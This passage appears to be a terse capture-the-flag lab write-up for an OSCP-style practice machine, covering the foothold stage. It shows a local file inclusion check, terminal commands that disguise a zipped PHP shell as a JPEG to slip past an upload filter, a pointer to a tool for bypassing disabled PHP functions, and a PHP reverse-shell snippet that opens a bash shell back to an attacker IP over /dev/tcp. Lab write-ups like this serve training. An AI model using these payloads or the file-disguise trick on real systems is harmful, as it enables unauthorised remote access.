Foothold

Local File Inclusion

Direct Access set to false
Get the page
If the page doesn't have /bin, usr, home, var, etc
Then it does and include on the page variable and appends .php
Else, it includes checker.php

Fuzzing

adot@kali:~/htb/oscp/updown$ zip payload.phar rev.php 
  adding: rev.php (deflated 60%)
                                                                                                                                                                                                                                              
adot@kali:~/htb/oscp/updown$ mv payload.phar payload.jpeg
                                                                                                                                                                                                                                              
adot@kali:~/htb/oscp/updown$ file payload.jpeg                                                    
payload.jpeg: Zip archive data, at least v2.0 to extract, compression method=deflate

System, exec and shell_exec are all disabled functions so we cant execute system commands

GitHub - teambi0s/dfunc-bypasser: This tool is for letting you know how strong your disable_functions is and how you can bypass that.GitHub

Add header to dfunc

https://gist.github.com/noobpk/33e4318c7533f32d6a7ce096bc0457b7#file-reverse-shell-php-L62

<?php
        $descspec = array(
                0 => array("pipe", "r"),
                1 => array("pipe", "w"),
                2 => array("pipe", "w")
        );
        $cmd = "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.7/1337 0>&1'";
        $proc = proc_open($cmd, $descspec, $pipes);

Previous80 NextPriv Esc

Last updated 1 year ago

Was this helpful?